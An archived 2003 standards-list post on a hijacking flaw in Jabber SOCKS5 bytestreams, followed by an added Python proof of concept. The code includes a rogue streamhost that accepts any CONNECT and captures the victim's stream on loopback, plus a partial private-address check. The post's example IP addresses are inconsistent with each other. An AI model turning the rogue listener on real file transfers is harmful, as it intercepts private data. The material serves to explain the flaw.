[standards-jig] S5B vulnerability
justin-keyword-jabber.093179 at affinix.com
Sun Dec 7 05:52:13 UTC 2003
It seems that it is possible to hijack a connection rather easily with S5B
when there are two private networks involved.
Network 1 - external: 22.214.171.124, internal: 192.168.0.x
Client A - 192.168.0.32
Network 2 - external: 126.96.36.199, internal: 192.168.0.x
Client B - 192.168.0.40
Client C - 192.168.0.32
Client A wishes to contact Client B, and sends an S5B iq packet containing
188.8.131.52 and 192.168.0.32 as streamhosts. Client C, the attacker,
simply needs to set his machine's IP address to the same as Client A. When
Client B tries to connect to 192.168.0.32, it will end up connecting to the
attacker. Because the SOCKS authentication is not mutual, the attacker does
not have to worry about providing any credentials to the target.
Please correct me if I am wrong.
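The connection step the post describes, as an added illustration that is not code from the original message or from any Jabber client. It models what JEP-0065 has the target do once it has the streamhost list: open TCP to the advertised address, perform a SOCKS5 handshake offering only the "no authentication" method, and send a CONNECT whose DST.ADDR is SHA1(SID + initiator JID + target JID). The rogue listener stands in for Client C: it answers every CONNECT with success, because nothing in the exchange requires the streamhost to prove it is Client A. Loopback is used in place of the spoofed 192.168.0.32; the JIDs, SID and payload are constructed, and the private-range check at the end is an added heuristic, not part of JEP-0065.

```python
import hashlib
import ipaddress
import socket
import struct
import threading

SOCKS_VERSION = 0x05
NO_AUTH = 0x00        # the only method a JEP-0065 target offers
CMD_CONNECT = 0x01
ATYP_DOMAIN = 0x03    # DST.ADDR is carried as a "domain name" (the hex hash)


def _recv_exact(conn, n):
    buf = b""
    while len(buf) < n:
        chunk = conn.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed early")
        buf += chunk
    return buf


def s5b_dst_addr(sid, initiator_jid, target_jid):
    """JEP-0065 DST.ADDR: hex SHA1 of SID followed by the two full JIDs."""
    return hashlib.sha1((sid + initiator_jid + target_jid).encode("utf-8")).hexdigest()


def target_connect(host, port, dst_addr, payload):
    """Client B's side: dial the streamhost from the IQ and do the handshake.
    Returns True if the far end accepted the CONNECT. No step here asks the
    streamhost for a credential, which is the gap the post points out."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(bytes([SOCKS_VERSION, 1, NO_AUTH]))          # greeting
        ver, method = _recv_exact(s, 2)
        if ver != SOCKS_VERSION or method != NO_AUTH:
            return False
        addr = dst_addr.encode("ascii")
        req = struct.pack("!BBBBB", SOCKS_VERSION, CMD_CONNECT, 0, ATYP_DOMAIN, len(addr))
        s.sendall(req + addr + struct.pack("!H", 0))           # DST.PORT = 0
        ver, rep, _rsv, atyp = _recv_exact(s, 4)
        if atyp == ATYP_DOMAIN:
            _recv_exact(s, _recv_exact(s, 1)[0] + 2)           # BND.ADDR, BND.PORT
        if ver != SOCKS_VERSION or rep != 0x00:
            return False
        s.sendall(payload)                                     # stream data
        return True


class RogueStreamhost:
    """Client C's listener: speaks just enough SOCKS5 to accept any CONNECT
    and records the DST.ADDR and stream bytes it receives."""

    def __init__(self, bind_host="127.0.0.1"):
        self.sock = socket.socket()
        self.sock.bind((bind_host, 0))          # ephemeral port for the demo
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]
        self.seen_dst_addr = None
        self.captured = b""
        self.thread = threading.Thread(target=self._serve, daemon=True)
        self.thread.start()

    def _serve(self):
        conn, _ = self.sock.accept()
        with conn:
            conn.settimeout(5)
            _ver, nmethods = _recv_exact(conn, 2)
            _recv_exact(conn, nmethods)          # offered methods; ignored
            conn.sendall(bytes([SOCKS_VERSION, NO_AUTH]))
            _ver, _cmd, _rsv, _atyp = _recv_exact(conn, 4)
            alen = _recv_exact(conn, 1)[0]
            self.seen_dst_addr = _recv_exact(conn, alen).decode("ascii")
            _recv_exact(conn, 2)                 # DST.PORT
            # Succeed unconditionally: the hash is whatever B sent us, and the
            # protocol gives B no way to tell this socket from Client A's.
            reply = bytes([SOCKS_VERSION, 0x00, 0x00, ATYP_DOMAIN, alen])
            conn.sendall(reply + self.seen_dst_addr.encode("ascii") + b"\x00\x00")
            try:
                while True:
                    chunk = conn.recv(4096)
                    if not chunk:
                        break
                    self.captured += chunk
            except socket.timeout:
                pass
        self.sock.close()


def streamhost_on_private_range(host):
    """Added check (not in JEP-0065): a streamhost on an RFC 1918 address is
    only meaningful if both peers share a LAN, and it is exactly the address
    another private network with the same numbering can impersonate."""
    return ipaddress.ip_address(host).is_private


def demo_hijack():
    """B believes 127.0.0.1:port is A's streamhost; C is what actually answers."""
    sid, initiator, target = "stream-1234", "a@example.org/home", "b@example.org/home"
    rogue = RogueStreamhost()
    dst = s5b_dst_addr(sid, initiator, target)
    ok = target_connect("127.0.0.1", rogue.port, dst, b"private data for A")
    rogue.thread.join(timeout=10)
    return ok, rogue.seen_dst_addr == dst, rogue.captured


if __name__ == "__main__":
    print(demo_hijack())
    print(streamhost_on_private_range("192.168.0.32"), streamhost_on_private_range("22.214.171.124"))
```

A target that applies the private-range check would at least prefer the external streamhost over a 192.168.x.x one when the two are offered together, but that is a heuristic; the handshake itself still carries nothing that binds the socket to Client A.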